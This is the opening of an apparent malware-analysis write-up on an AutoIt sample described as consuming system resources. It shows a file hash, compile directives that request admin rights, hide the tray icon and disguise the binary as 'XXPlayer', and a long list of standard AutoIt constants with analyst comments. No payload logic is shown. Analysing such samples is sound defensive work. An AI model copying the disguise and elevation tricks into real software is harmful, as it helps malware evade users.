
An AutoIt sample that maliciously consumes system resources


File MD5: b1c05acd8cbbf1bd9a2448da0c10c411

Signs of infection

Basic information acquisition

Basic PE information

The decoded script is:

/ / 2017-12-1 22:43

; Analyst note: compile-time directives recovered with the decoded script.
; NOTE(review): the space after "#" (and inside the icon path below) looks like an
; artifact of the page's translation/extraction, not of the sample — confirm against the sample.
; NoTrayIcon: the running script shows no AutoIt tray icon.
# NoTrayIcon

; RequireAdmin: the compiled binary asks for elevation when it starts.
# RequireAdmin

# Region

; Icon is taken from shell32.dll (resource -138) rather than shipped with the script.
# AutoIt3Wrapper_icon=C:\ Windows\ system32\ SHELL32.dll |-138

; UPX packing is turned off for the compiled binary.
# AutoIt3Wrapper_UseUpx=n

; The version-resource fields below label the binary as "XXPlayer" 2.2.3.3; these
; strings are usable for static triage/hunting alongside the file hash.
# AutoIt3Wrapper_Res_Comment=XXPlayer

# AutoIt3Wrapper_Res_Description=XXPlayer

# AutoIt3Wrapper_Res_Fileversion=2.2.3.3

# AutoIt3Wrapper_Res_LegalCopyright=XXPlayer

# EndRegion

; Analyst note: the GLOBAL CONST run from here through $GUI_SS_DEFAULT_GUI only defines
; GUI, window-style, window-message and system-metric constants; no line in it performs
; an action. The names match AutoIt's standard include files (presumably
; GUIConstantsEx.au3 / WindowsConstants.au3 pulled in at compile time — confirm).
; The sample's own behaviour starts at the first $ICO assignment after the constants.
GLOBAL CONST $GUI_EVENT_CLOSE =-3

GLOBAL CONST $GUI_EVENT_MINIMIZE =-4

GLOBAL CONST $GUI_EVENT_RESTORE =-5

GLOBAL CONST $GUI_EVENT_MAXIMIZE =-6

GLOBAL CONST $GUI_EVENT_PRIMARYDOWN =-7

GLOBAL CONST $GUI_EVENT_PRIMARYUP =-8

GLOBAL CONST $GUI_EVENT_SECONDARYDOWN =-9

GLOBAL CONST $GUI_EVENT_SECONDARYUP =-10

GLOBAL CONST $GUI_EVENT_MOUSEMOVE =-11

GLOBAL CONST $GUI_EVENT_RESIZED =-12

GLOBAL CONST $GUI_EVENT_DROPPED =-13

GLOBAL CONST $GUI_RUNDEFMSG = "GUI_RUNDEFMSG"

GLOBAL CONST $GUI_AVISTOP = 0

GLOBAL CONST $GUI_AVISTART = 1

GLOBAL CONST $GUI_AVICLOSE = 2

GLOBAL CONST $GUI_CHECKED = 1

GLOBAL CONST $GUI_INDETERMINATE = 2

GLOBAL CONST $GUI_UNCHECKED = 4

GLOBAL CONST $GUI_DROPACCEPTED = 8

GLOBAL CONST $GUI_NODROPACCEPTED = 4096

GLOBAL CONST $GUI_ACCEPTFILES = $GUI_DROPACCEPTED

GLOBAL CONST $GUI_SHOW = 16

GLOBAL CONST $GUI_HIDE = 32

GLOBAL CONST $GUI_ENABLE = 64

GLOBAL CONST $GUI_DISABLE = 128

GLOBAL CONST $GUI_FOCUS = 256

GLOBAL CONST $GUI_NOFOCUS = 8192

GLOBAL CONST $GUI_DEFBUTTON = 512

GLOBAL CONST $GUI_EXPAND = 1024

GLOBAL CONST $GUI_ONTOP = 2048

GLOBAL CONST $GUI_FONTITALIC = 2

GLOBAL CONST $GUI_FONTUNDER = 4

GLOBAL CONST $GUI_FONTSTRIKE = 8

GLOBAL CONST $GUI_DOCKAUTO = 1

GLOBAL CONST $GUI_DOCKLEFT = 2

GLOBAL CONST $GUI_DOCKRIGHT = 4

GLOBAL CONST $GUI_DOCKHCENTER = 8

GLOBAL CONST $GUI_DOCKTOP = 32

GLOBAL CONST $GUI_DOCKBOTTOM = 64

GLOBAL CONST $GUI_DOCKVCENTER = 128

GLOBAL CONST $GUI_DOCKWIDTH = 256

GLOBAL CONST $GUI_DOCKHEIGHT = 512

GLOBAL CONST $GUI_DOCKSIZE = 768

GLOBAL CONST $GUI_DOCKMENUBAR = 544

GLOBAL CONST $GUI_DOCKSTATEBAR = 576

GLOBAL CONST $GUI_DOCKALL = 802

GLOBAL CONST $GUI_DOCKBORDERS = 102

GLOBAL CONST $GUI_GR_CLOSE = 1

GLOBAL CONST $GUI_GR_LINE = 2

GLOBAL CONST $GUI_GR_BEZIER = 4

GLOBAL CONST $GUI_GR_MOVE = 6

GLOBAL CONST $GUI_GR_COLOR = 8

GLOBAL CONST $GUI_GR_RECT = 10

GLOBAL CONST $GUI_GR_ELLIPSE = 12

GLOBAL CONST $GUI_GR_PIE = 14

GLOBAL CONST $GUI_GR_DOT = 16

GLOBAL CONST $GUI_GR_PIXEL = 18

GLOBAL CONST $GUI_GR_HINT = 20

GLOBAL CONST $GUI_GR_REFRESH = 22

GLOBAL CONST $GUI_GR_PENSIZE = 24

GLOBAL CONST $GUI_GR_NOBKCOLOR =-2

GLOBAL CONST $GUI_BKCOLOR_DEFAULT =-1

GLOBAL CONST $GUI_BKCOLOR_TRANSPARENT =-2

GLOBAL CONST $GUI_BKCOLOR_LV_ALTERNATE =-33554432

GLOBAL CONST $GUI_WS_EX_PARENTDRAG = 1048576

GLOBAL CONST $WS_TILED = 0

GLOBAL CONST $WS_OVERLAPPED = 0

GLOBAL CONST $WS_MAXIMIZEBOX = 65536

GLOBAL CONST $WS_MINIMIZEBOX = 131072

GLOBAL CONST $WS_TABSTOP = 65536

GLOBAL CONST $WS_GROUP = 131072

GLOBAL CONST $WS_SIZEBOX = 262144

GLOBAL CONST $WS_THICKFRAME = 262144

GLOBAL CONST $WS_SYSMENU = 524288

GLOBAL CONST $WS_HSCROLL = 1048576

GLOBAL CONST $WS_VSCROLL = 2097152

GLOBAL CONST $WS_DLGFRAME = 4194304

GLOBAL CONST $WS_BORDER = 8388608

GLOBAL CONST $WS_CAPTION = 12582912

GLOBAL CONST $WS_OVERLAPPEDWINDOW = 13565952

GLOBAL CONST $WS_TILEDWINDOW = 13565952

GLOBAL CONST $WS_MAXIMIZE = 16777216

GLOBAL CONST $WS_CLIPCHILDREN = 33554432

GLOBAL CONST $WS_CLIPSIBLINGS = 67108864

GLOBAL CONST $WS_DISABLED = 134217728

GLOBAL CONST $WS_VISIBLE = 268435456

GLOBAL CONST $WS_MINIMIZE = 536870912

GLOBAL CONST $WS_CHILD = 1073741824

GLOBAL CONST $WS_POPUP =-2147483648

GLOBAL CONST $WS_POPUPWINDOW =-2138570752

GLOBAL CONST $DS_MODALFRAME = 128

GLOBAL CONST $DS_SETFOREGROUND = 512

GLOBAL CONST $DS_CONTEXTHELP = 8192

GLOBAL CONST $WS_EX_ACCEPTFILES = 16

GLOBAL CONST $WS_EX_MDICHILD = 64

GLOBAL CONST $WS_EX_APPWINDOW = 262144

GLOBAL CONST $WS_EX_COMPOSITED = 33554432

GLOBAL CONST $WS_EX_CLIENTEDGE = 512

GLOBAL CONST $WS_EX_CONTEXTHELP = 1024

GLOBAL CONST $WS_EX_DLGMODALFRAME = 1

GLOBAL CONST $WS_EX_LEFTSCROLLBAR = 16384

GLOBAL CONST $WS_EX_OVERLAPPEDWINDOW = 768

GLOBAL CONST $WS_EX_RIGHT = 4096

GLOBAL CONST $WS_EX_STATICEDGE = 131072

GLOBAL CONST $WS_EX_TOOLWINDOW = 128

GLOBAL CONST $WS_EX_TOPMOST = 8

GLOBAL CONST $WS_EX_TRANSPARENT = 32

GLOBAL CONST $WS_EX_WINDOWEDGE = 256

GLOBAL CONST $WS_EX_LAYERED = 524288

GLOBAL CONST $WS_EX_CONTROLPARENT = 65536

GLOBAL CONST $WS_EX_LAYOUTRTL = 4194304

GLOBAL CONST $WS_EX_RTLREADING = 8192

GLOBAL CONST $WM_GETTEXTLENGTH = 14

GLOBAL CONST $WM_GETTEXT = 13

GLOBAL CONST $WM_SIZE = 5

GLOBAL CONST $WM_SIZING = 532

GLOBAL CONST $WM_USER = 1024

GLOBAL CONST $WM_CREATE = 1

GLOBAL CONST $WM_DESTROY = 2

GLOBAL CONST $WM_MOVE = 3

GLOBAL CONST $WM_ACTIVATE = 6

GLOBAL CONST $WM_SETFOCUS = 7

GLOBAL CONST $WM_KILLFOCUS = 8

GLOBAL CONST $WM_ENABLE = 10

GLOBAL CONST $WM_SETREDRAW = 11

GLOBAL CONST $WM_SETTEXT = 12

GLOBAL CONST $WM_PAINT = 15

GLOBAL CONST $WM_CLOSE = 16

GLOBAL CONST $WM_QUIT = 18

GLOBAL CONST $WM_ERASEBKGND = 20

GLOBAL CONST $WM_SYSCOLORCHANGE = 21

GLOBAL CONST $WM_SHOWWINDOW = 24

GLOBAL CONST $WM_WININICHANGE = 26

GLOBAL CONST $WM_DEVMODECHANGE = 27

GLOBAL CONST $WM_ACTIVATEAPP = 28

GLOBAL CONST $WM_FONTCHANGE = 29

GLOBAL CONST $WM_TIMECHANGE = 30

GLOBAL CONST $WM_CANCELMODE = 31

GLOBAL CONST $WM_SETCURSOR = 32

GLOBAL CONST $WM_MOUSEACTIVATE = 33

GLOBAL CONST $WM_CHILDACTIVATE = 34

GLOBAL CONST $WM_QUEUESYNC = 35

GLOBAL CONST $WM_GETMINMAXINFO = 36

GLOBAL CONST $WM_PAINTICON = 38

GLOBAL CONST $WM_ICONERASEBKGND = 39

GLOBAL CONST $WM_NEXTDLGCTL = 40

GLOBAL CONST $WM_SPOOLERSTATUS = 42

GLOBAL CONST $WM_DRAWITEM = 43

GLOBAL CONST $WM_MEASUREITEM = 44

GLOBAL CONST $WM_DELETEITEM = 45

GLOBAL CONST $WM_VKEYTOITEM = 46

GLOBAL CONST $WM_CHARTOITEM = 47

GLOBAL CONST $WM_SETFONT = 48

GLOBAL CONST $WM_GETFONT = 49

GLOBAL CONST $WM_SETHOTKEY = 50

GLOBAL CONST $WM_GETHOTKEY = 51

GLOBAL CONST $WM_QUERYDRAGICON = 55

GLOBAL CONST $WM_COMPAREITEM = 57

GLOBAL CONST $WM_GETOBJECT = 61

GLOBAL CONST $WM_COMPACTING = 65

GLOBAL CONST $WM_COMMNOTIFY = 68

GLOBAL CONST $WM_WINDOWPOSCHANGING = 70

GLOBAL CONST $WM_WINDOWPOSCHANGED = 71

GLOBAL CONST $WM_POWER = 72

GLOBAL CONST $WM_NOTIFY = 78

GLOBAL CONST $WM_COPYDATA = 74

GLOBAL CONST $WM_CANCELJOURNAL = 75

GLOBAL CONST $WM_INPUTLANGCHANGEREQUEST = 80

GLOBAL CONST $WM_INPUTLANGCHANGE = 81

GLOBAL CONST $WM_TCARD = 82

GLOBAL CONST $WM_HELP = 83

GLOBAL CONST $WM_USERCHANGED = 84

GLOBAL CONST $WM_NOTIFYFORMAT = 85

GLOBAL CONST $WM_CUT = 768

GLOBAL CONST $WM_COPY = 769

GLOBAL CONST $WM_PASTE = 770

GLOBAL CONST $WM_CLEAR = 771

GLOBAL CONST $WM_UNDO = 772

GLOBAL CONST $WM_CONTEXTMENU = 123

GLOBAL CONST $WM_STYLECHANGING = 124

GLOBAL CONST $WM_STYLECHANGED = 125

GLOBAL CONST $WM_DISPLAYCHANGE = 126

GLOBAL CONST $WM_GETICON = 127,

GLOBAL CONST $WM_SETICON = 128

GLOBAL CONST $WM_NCCREATE = 129

GLOBAL CONST $WM_NCDESTROY = 130

GLOBAL CONST $WM_NCCALCSIZE = 131,

GLOBAL CONST $WM_NCHITTEST = 132

GLOBAL CONST $WM_NCPAINT = 133

GLOBAL CONST $WM_NCACTIVATE = 134

GLOBAL CONST $WM_GETDLGCODE = 135

GLOBAL CONST $WM_SYNCPAINT = 136

GLOBAL CONST $WM_NCMOUSEMOVE = 160,

GLOBAL CONST $WM_NCLBUTTONDOWN = 161,

GLOBAL CONST $WM_NCLBUTTONUP = 162,

GLOBAL CONST $WM_NCLBUTTONDBLCLK = 163,

GLOBAL CONST $WM_NCRBUTTONDOWN = 164,

GLOBAL CONST $WM_NCRBUTTONUP = 165,

GLOBAL CONST $WM_NCRBUTTONDBLCLK = 166

GLOBAL CONST $WM_NCMBUTTONDOWN = 167,

GLOBAL CONST $WM_NCMBUTTONUP = 168

GLOBAL CONST $WM_NCMBUTTONDBLCLK = 169

GLOBAL CONST $WM_KEYDOWN = 256

GLOBAL CONST $WM_KEYUP = 257

GLOBAL CONST $WM_CHAR = 258

GLOBAL CONST $WM_DEADCHAR = 259

GLOBAL CONST $WM_SYSKEYDOWN = 260

GLOBAL CONST $WM_SYSKEYUP = 261

GLOBAL CONST $WM_SYSCHAR = 262,

GLOBAL CONST $WM_SYSDEADCHAR = 263

GLOBAL CONST $WM_INITDIALOG = 272

GLOBAL CONST $WM_COMMAND = 273

GLOBAL CONST $WM_SYSCOMMAND = 274

GLOBAL CONST $WM_TIMER = 275

GLOBAL CONST $WM_HSCROLL = 276

GLOBAL CONST $WM_VSCROLL = 277

GLOBAL CONST $WM_INITMENU = 278

GLOBAL CONST $WM_INITMENUPOPUP = 279

GLOBAL CONST $WM_MENUSELECT = 287

GLOBAL CONST $WM_MENUCHAR = 288

GLOBAL CONST $WM_ENTERIDLE = 289

GLOBAL CONST $WM_MENURBUTTONUP = 290

GLOBAL CONST $WM_MENUDRAG = 291

GLOBAL CONST $WM_MENUGETOBJECT = 292

GLOBAL CONST $WM_UNINITMENUPOPUP = 293

GLOBAL CONST $WM_MENUCOMMAND = 294

GLOBAL CONST $WM_CHANGEUISTATE = 295

GLOBAL CONST $WM_UPDATEUISTATE = 296

GLOBAL CONST $WM_QUERYUISTATE = 297

GLOBAL CONST $WM_CTLCOLORMSGBOX = 306

GLOBAL CONST $WM_CTLCOLOREDIT = 307

GLOBAL CONST $WM_CTLCOLORLISTBOX = 308

GLOBAL CONST $WM_CTLCOLORBTN = 309

GLOBAL CONST $WM_CTLCOLORDLG = 310

GLOBAL CONST $WM_CTLCOLORSCROLLBAR = 311

GLOBAL CONST $WM_CTLCOLORSTATIC = 312

GLOBAL CONST $WM_CTLCOLOR = 25

GLOBAL CONST $MN_GETHMENU = 481,

GLOBAL CONST $NM_FIRST = 0

GLOBAL CONST $NM_OUTOFMEMORY = $NM_FIRST-1

GLOBAL CONST $NM_CLICK = $NM_FIRST-2

GLOBAL CONST $NM_DBLCLK = $NM_FIRST-3

GLOBAL CONST $NM_RETURN = $NM_FIRST-4

GLOBAL CONST $NM_RCLICK = $NM_FIRST-5

GLOBAL CONST $NM_RDBLCLK = $NM_FIRST-6

GLOBAL CONST $NM_SETFOCUS = $NM_FIRST-7

GLOBAL CONST $NM_KILLFOCUS = $NM_FIRST-8

GLOBAL CONST $NM_CUSTOMDRAW = $NM_FIRST-12

GLOBAL CONST $NM_HOVER = $NM_FIRST-13

GLOBAL CONST $NM_NCHITTEST = $NM_FIRST-14

GLOBAL CONST $NM_KEYDOWN = $NM_FIRST-15

GLOBAL CONST $NM_RELEASEDCAPTURE = $NM_FIRST-16

GLOBAL CONST $NM_SETCURSOR = $NM_FIRST-17

GLOBAL CONST $NM_CHAR = $NM_FIRST-18

GLOBAL CONST $NM_TOOLTIPSCREATED = $NM_FIRST-19

GLOBAL CONST $NM_LDOWN = $NM_FIRST-20

GLOBAL CONST $NM_RDOWN = $NM_FIRST-21

GLOBAL CONST $NM_THEMECHANGED = $NM_FIRST-22

GLOBAL CONST $WM_MOUSEMOVE = 512

GLOBAL CONST $WM_LBUTTONDOWN = 513

GLOBAL CONST $WM_LBUTTONUP = 514

GLOBAL CONST $WM_LBUTTONDBLCLK = 515

GLOBAL CONST $WM_RBUTTONDOWN = 516

GLOBAL CONST $WM_RBUTTONUP = 517

GLOBAL CONST $WM_RBUTTONDBLCK = 518

GLOBAL CONST $WM_MBUTTONDOWN = 519

GLOBAL CONST $WM_MBUTTONUP = 520

GLOBAL CONST $WM_MBUTTONDBLCK = 521

GLOBAL CONST $WM_MOUSEWHEEL = 522

GLOBAL CONST $WM_XBUTTONDOWN = 523

GLOBAL CONST $WM_XBUTTONUP = 524

GLOBAL CONST $WM_XBUTTONDBLCLK = 525

GLOBAL CONST $WM_MOUSEHWHEEL = 526

GLOBAL CONST $PS_SOLID = 0

GLOBAL CONST $PS_DASH = 1

GLOBAL CONST $PS_DOT = 2

GLOBAL CONST $PS_DASHDOT = 3

GLOBAL CONST $PS_DASHDOTDOT = 4

GLOBAL CONST $PS_NULL = 5

GLOBAL CONST $PS_INSIDEFRAME = 6

GLOBAL CONST $LWA_ALPHA = 2

GLOBAL CONST $LWA_COLORKEY = 1

GLOBAL CONST $RGN_AND = 1

GLOBAL CONST $RGN_OR = 2

GLOBAL CONST $RGN_XOR = 3

GLOBAL CONST $RGN_DIFF = 4

GLOBAL CONST $RGN_COPY = 5

GLOBAL CONST $ERRORREGION = 0

GLOBAL CONST $NULLREGION = 1

GLOBAL CONST $SIMPLEREGION = 2

GLOBAL CONST $COMPLEXREGION = 3

GLOBAL CONST $TRANSPARENT = 1

GLOBAL CONST $OPAQUE = 2

GLOBAL CONST $CCM_FIRST = 8192

GLOBAL CONST $CCM_GETUNICODEFORMAT = ($CCM_FIRST + 6)

GLOBAL CONST $CCM_SETUNICODEFORMAT = ($CCM_FIRST + 5)

GLOBAL CONST $CCM_SETBKCOLOR = $CCM_FIRST + 1

GLOBAL CONST $CCM_SETCOLORSCHEME = $CCM_FIRST + 2

GLOBAL CONST $CCM_GETCOLORSCHEME = $CCM_FIRST + 3

GLOBAL CONST $CCM_GETDROPTARGET = $CCM_FIRST + 4

GLOBAL CONST $CCM_SETWINDOWTHEME = $CCM_FIRST + 11

GLOBAL CONST $GA_PARENT = 1

GLOBAL CONST $GA_ROOT = 2

GLOBAL CONST $GA_ROOTOWNER = 3

GLOBAL CONST $SM_CXSCREEN = 0

GLOBAL CONST $SM_CYSCREEN = 1

GLOBAL CONST $SM_CXVSCROLL = 2

GLOBAL CONST $SM_CYHSCROLL = 3

GLOBAL CONST $SM_CYCAPTION = 4

GLOBAL CONST $SM_CXBORDER = 5

GLOBAL CONST $SM_CYBORDER = 6

GLOBAL CONST $SM_CXDLGFRAME = 7

GLOBAL CONST $SM_CYDLGFRAME = 8

GLOBAL CONST $SM_CYVTHUMB = 9

GLOBAL CONST $SM_CXHTHUMB = 10

GLOBAL CONST $SM_CXICON = 11

GLOBAL CONST $SM_CYICON = 12

GLOBAL CONST $SM_CXCURSOR = 13

GLOBAL CONST $SM_CYCURSOR = 14

GLOBAL CONST $SM_CYMENU = 15

GLOBAL CONST $SM_CXFULLSCREEN = 16

GLOBAL CONST $SM_CYFULLSCREEN = 17

GLOBAL CONST $SM_CYKANJIWINDOW = 18

GLOBAL CONST $SM_MOUSEPRESENT = 19

GLOBAL CONST $SM_CYVSCROLL = 20

GLOBAL CONST $SM_CXHSCROLL = 21

GLOBAL CONST $SM_DEBUG = 22

GLOBAL CONST $SM_SWAPBUTTON = 23

GLOBAL CONST $SM_RESERVED1 = 24

GLOBAL CONST $SM_RESERVED2 = 25

GLOBAL CONST $SM_RESERVED3 = 26

GLOBAL CONST $SM_RESERVED4 = 27

GLOBAL CONST $SM_CXMIN = 28

GLOBAL CONST $SM_CYMIN = 29

GLOBAL CONST $SM_CXSIZE = 30

GLOBAL CONST $SM_CYSIZE = 31

GLOBAL CONST $SM_CXFRAME = 32

GLOBAL CONST $SM_CYFRAME = 33

GLOBAL CONST $SM_CXMINTRACK = 34

GLOBAL CONST $SM_CYMINTRACK = 35

GLOBAL CONST $SM_CXDOUBLECLK = 36

GLOBAL CONST $SM_CYDOUBLECLK = 37

GLOBAL CONST $SM_CXICONSPACING = 38

GLOBAL CONST $SM_CYICONSPACING = 39

GLOBAL CONST $SM_MENUDROPALIGNMENT = 40

GLOBAL CONST $SM_PENWINDOWS = 41

GLOBAL CONST $SM_DBCSENABLED = 42

GLOBAL CONST $SM_CMOUSEBUTTONS = 43

GLOBAL CONST $SM_SECURE = 44

GLOBAL CONST $SM_CXEDGE = 45

GLOBAL CONST $SM_CYEDGE = 46

GLOBAL CONST $SM_CXMINSPACING = 47

GLOBAL CONST $SM_CYMINSPACING = 48

GLOBAL CONST $SM_CXSMICON = 49

GLOBAL CONST $SM_CYSMICON = 50

GLOBAL CONST $SM_CYSMCAPTION = 51

GLOBAL CONST $SM_CXSMSIZE = 52

GLOBAL CONST $SM_CYSMSIZE = 53

GLOBAL CONST $SM_CXMENUSIZE = 54

GLOBAL CONST $SM_CYMENUSIZE = 55

GLOBAL CONST $SM_ARRANGE = 56

GLOBAL CONST $SM_CXMINIMIZED = 57

GLOBAL CONST $SM_CYMINIMIZED = 58

GLOBAL CONST $SM_CXMAXTRACK = 59

GLOBAL CONST $SM_CYMAXTRACK = 60

GLOBAL CONST $SM_CXMAXIMIZED = 61

GLOBAL CONST $SM_CYMAXIMIZED = 62

GLOBAL CONST $SM_NETWORK = 63

GLOBAL CONST $SM_CLEANBOOT = 67

GLOBAL CONST $SM_CXDRAG = 68

GLOBAL CONST $SM_CYDRAG = 69

GLOBAL CONST $SM_SHOWSOUNDS = 70

GLOBAL CONST $SM_CXMENUCHECK = 71

GLOBAL CONST $SM_CYMENUCHECK = 72

GLOBAL CONST $SM_SLOWMACHINE = 73

GLOBAL CONST $SM_MIDEASTENABLED = 74

GLOBAL CONST $SM_MOUSEWHEELPRESENT = 75

GLOBAL CONST $SM_XVIRTUALSCREEN = 76

GLOBAL CONST $SM_YVIRTUALSCREEN = 77

GLOBAL CONST $SM_CXVIRTUALSCREEN = 78

GLOBAL CONST $SM_CYVIRTUALSCREEN = 79

GLOBAL CONST $SM_CMONITORS = 80

GLOBAL CONST $SM_SAMEDISPLAYFORMAT = 81

GLOBAL CONST $SM_IMMENABLED = 82

GLOBAL CONST $SM_CXFOCUSBORDER = 83

GLOBAL CONST $SM_CYFOCUSBORDER = 84

GLOBAL CONST $SM_TABLETPC = 86

GLOBAL CONST $SM_MEDIACENTER = 87

GLOBAL CONST $SM_STARTER = 88

GLOBAL CONST $SM_SERVERR2 = 89

GLOBAL CONST $SM_CMETRICS = 90

GLOBAL CONST $SM_REMOTESESSION = 4096

GLOBAL CONST $SM_SHUTTINGDOWN = 8192

GLOBAL CONST $SM_REMOTECONTROL = 8193

GLOBAL CONST $SM_CARETBLINKINGENABLED = 8194

GLOBAL CONST $BLACKNESS = 66

GLOBAL CONST $CAPTUREBLT = 1073741824

GLOBAL CONST $DSTINVERT = 5570569

GLOBAL CONST $MERGECOPY = 12583114

GLOBAL CONST $MERGEPAINT = 12255782

GLOBAL CONST $NOMIRRORBITMAP =-2147483648

GLOBAL CONST $NOTSRCCOPY = 3342344

GLOBAL CONST $NOTSRCERASE = 1114278

GLOBAL CONST $PATCOPY = 15728673

GLOBAL CONST $PATINVERT = 5898313

GLOBAL CONST $PATPAINT = 16452105

GLOBAL CONST $SRCAND = 8913094

GLOBAL CONST $SRCCOPY = 13369376

GLOBAL CONST $SRCERASE = 4457256

GLOBAL CONST $SRCINVERT = 6684742

GLOBAL CONST $SRCPAINT = 15597702

GLOBAL CONST $WHITENESS = 16711778

GLOBAL CONST $DT_BOTTOM = 8

GLOBAL CONST $DT_CALCRECT = 1024

GLOBAL CONST $DT_CENTER = 1

GLOBAL CONST $DT_EDITCONTROL = 8192

GLOBAL CONST $DT_END_ELLIPSIS = 32768

GLOBAL CONST $DT_EXPANDTABS = 64

GLOBAL CONST $DT_EXTERNALLEADING = 512

GLOBAL CONST $DT_HIDEPREFIX = 1048576

GLOBAL CONST $DT_INTERNAL = 4096

GLOBAL CONST $DT_LEFT = 0

GLOBAL CONST $DT_MODIFYSTRING = 65536

GLOBAL CONST $DT_NOCLIP = 256

GLOBAL CONST $DT_NOFULLWIDTHCHARBREAK = 524288

GLOBAL CONST $DT_NOPREFIX = 2048

GLOBAL CONST $DT_PATH_ELLIPSIS = 16384

GLOBAL CONST $DT_PREFIXONLY = 2097152

GLOBAL CONST $DT_RIGHT = 2

GLOBAL CONST $DT_RTLREADING = 131072

GLOBAL CONST $DT_SINGLELINE = 32

GLOBAL CONST $DT_TABSTOP = 128

GLOBAL CONST $DT_TOP = 0

GLOBAL CONST $DT_VCENTER = 4

GLOBAL CONST $DT_WORDBREAK = 16

GLOBAL CONST $DT_WORD_ELLIPSIS = 262144

GLOBAL CONST $RDW_ERASE = 4

GLOBAL CONST $RDW_FRAME = 1024

GLOBAL CONST $RDW_INTERNALPAINT = 2

GLOBAL CONST $RDW_INVALIDATE = 1

GLOBAL CONST $RDW_NOERASE = 32

GLOBAL CONST $RDW_NOFRAME = 2048

GLOBAL CONST $RDW_NOINTERNALPAINT = 16

GLOBAL CONST $RDW_VALIDATE = 8

GLOBAL CONST $RDW_ERASENOW = 512

GLOBAL CONST $RDW_UPDATENOW = 256

GLOBAL CONST $RDW_ALLCHILDREN = 128

GLOBAL CONST $RDW_NOCHILDREN = 64

GLOBAL CONST $WM_RENDERFORMAT = 773

GLOBAL CONST $WM_RENDERALLFORMATS = 774

GLOBAL CONST $WM_DESTROYCLIPBOARD = 775

GLOBAL CONST $WM_DRAWCLIPBOARD = 776

GLOBAL CONST $WM_PAINTCLIPBOARD = 777

GLOBAL CONST $WM_VSCROLLCLIPBOARD = 778

GLOBAL CONST $WM_SIZECLIPBOARD = 779

GLOBAL CONST $WM_ASKCBFORMATNAME = 780

GLOBAL CONST $WM_CHANGECBCHAIN = 781

GLOBAL CONST $WM_HSCROLLCLIPBOARD = 782

GLOBAL CONST $HTERROR =-2

GLOBAL CONST $HTTRANSPARENT =-1

GLOBAL CONST $HTNOWHERE = 0

GLOBAL CONST $HTCLIENT = 1

GLOBAL CONST $HTCAPTION = 2

GLOBAL CONST $HTSYSMENU = 3

GLOBAL CONST $HTGROWBOX = 4

GLOBAL CONST $HTSIZE = $HTGROWBOX

GLOBAL CONST $HTMENU = 5

GLOBAL CONST $HTHSCROLL = 6

GLOBAL CONST $HTVSCROLL = 7

GLOBAL CONST $HTMINBUTTON = 8

GLOBAL CONST $HTMAXBUTTON = 9

GLOBAL CONST $HTLEFT = 10

GLOBAL CONST $HTRIGHT = 11

GLOBAL CONST $HTTOP = 12

GLOBAL CONST $HTTOPLEFT = 13

GLOBAL CONST $HTTOPRIGHT = 14

GLOBAL CONST $HTBOTTOM = 15

GLOBAL CONST $HTBOTTOMLEFT = 16

GLOBAL CONST $HTBOTTOMRIGHT = 17

GLOBAL CONST $HTBORDER = 18

GLOBAL CONST $HTREDUCE = $HTMINBUTTON

GLOBAL CONST $HTZOOM = $HTMAXBUTTON

GLOBAL CONST $HTSIZEFIRST = $HTLEFT

GLOBAL CONST $HTSIZELAST = $HTBOTTOMRIGHT

GLOBAL CONST $HTOBJECT = 19

GLOBAL CONST $HTCLOSE = 20

GLOBAL CONST $HTHELP = 21

GLOBAL CONST $COLOR_SCROLLBAR = 0

GLOBAL CONST $COLOR_BACKGROUND = 1

GLOBAL CONST $COLOR_ACTIVECAPTION = 2

GLOBAL CONST $COLOR_INACTIVECAPTION = 3

GLOBAL CONST $COLOR_MENU = 4

GLOBAL CONST $COLOR_WINDOW = 5

GLOBAL CONST $COLOR_WINDOWFRAME = 6

GLOBAL CONST $COLOR_MENUTEXT = 7

GLOBAL CONST $COLOR_WINDOWTEXT = 8

GLOBAL CONST $COLOR_CAPTIONTEXT = 9

GLOBAL CONST $COLOR_ACTIVEBORDER = 10

GLOBAL CONST $COLOR_INACTIVEBORDER = 11

GLOBAL CONST $COLOR_APPWORKSPACE = 12

GLOBAL CONST $COLOR_HIGHLIGHT = 13

GLOBAL CONST $COLOR_HIGHLIGHTTEXT = 14

GLOBAL CONST $COLOR_BTNFACE = 15

GLOBAL CONST $COLOR_BTNSHADOW = 16

GLOBAL CONST $COLOR_GRAYTEXT = 17

GLOBAL CONST $COLOR_BTNTEXT = 18

GLOBAL CONST $COLOR_INACTIVECAPTIONTEXT = 19

GLOBAL CONST $COLOR_BTNHIGHLIGHT = 20

GLOBAL CONST $COLOR_3DDKSHADOW = 21

GLOBAL CONST $COLOR_3DLIGHT = 22

GLOBAL CONST $COLOR_INFOTEXT = 23

GLOBAL CONST $COLOR_INFOBK = 24

GLOBAL CONST $COLOR_HOTLIGHT = 26

GLOBAL CONST $COLOR_GRADIENTACTIVECAPTION = 27

GLOBAL CONST $COLOR_GRADIENTINACTIVECAPTION = 28

GLOBAL CONST $COLOR_MENUHILIGHT = 29

GLOBAL CONST $COLOR_MENUBAR = 30

GLOBAL CONST $COLOR_DESKTOP = 1

GLOBAL CONST $COLOR_3DFACE = 15

GLOBAL CONST $COLOR_3DSHADOW = 16

GLOBAL CONST $COLOR_3DHIGHLIGHT = 20

GLOBAL CONST $COLOR_3DHILIGHT = 20

GLOBAL CONST $COLOR_BTNHILIGHT = 20

GLOBAL CONST $HINST_COMMCTRL =-1

GLOBAL CONST $IDB_STD_SMALL_COLOR = 0

GLOBAL CONST $IDB_STD_LARGE_COLOR = 1

GLOBAL CONST $IDB_VIEW_SMALL_COLOR = 4

GLOBAL CONST $IDB_VIEW_LARGE_COLOR = 5

GLOBAL CONST $IDB_HIST_SMALL_COLOR = 8

GLOBAL CONST $IDB_HIST_LARGE_COLOR = 9

GLOBAL CONST $STARTF_FORCEOFFFEEDBACK = 128

GLOBAL CONST $STARTF_FORCEONFEEDBACK = 64

GLOBAL CONST $STARTF_RUNFULLSCREEN = 32

GLOBAL CONST $STARTF_USECOUNTCHARS = 8

GLOBAL CONST $STARTF_USEFILLATTRIBUTE = 16

GLOBAL CONST $STARTF_USEHOTKEY = 512

GLOBAL CONST $STARTF_USEPOSITION = 4

GLOBAL CONST $STARTF_USESHOWWINDOW = 1

GLOBAL CONST $STARTF_USESIZE = 2

GLOBAL CONST $STARTF_USESTDHANDLES = 256

GLOBAL CONST $CDDS_PREPAINT = 1

GLOBAL CONST $CDDS_POSTPAINT = 2

GLOBAL CONST $CDDS_PREERASE = 3

GLOBAL CONST $CDDS_POSTERASE = 4

GLOBAL CONST $CDDS_ITEM = 65536

GLOBAL CONST $CDDS_ITEMPREPAINT = 65537

GLOBAL CONST $CDDS_ITEMPOSTPAINT = 65538

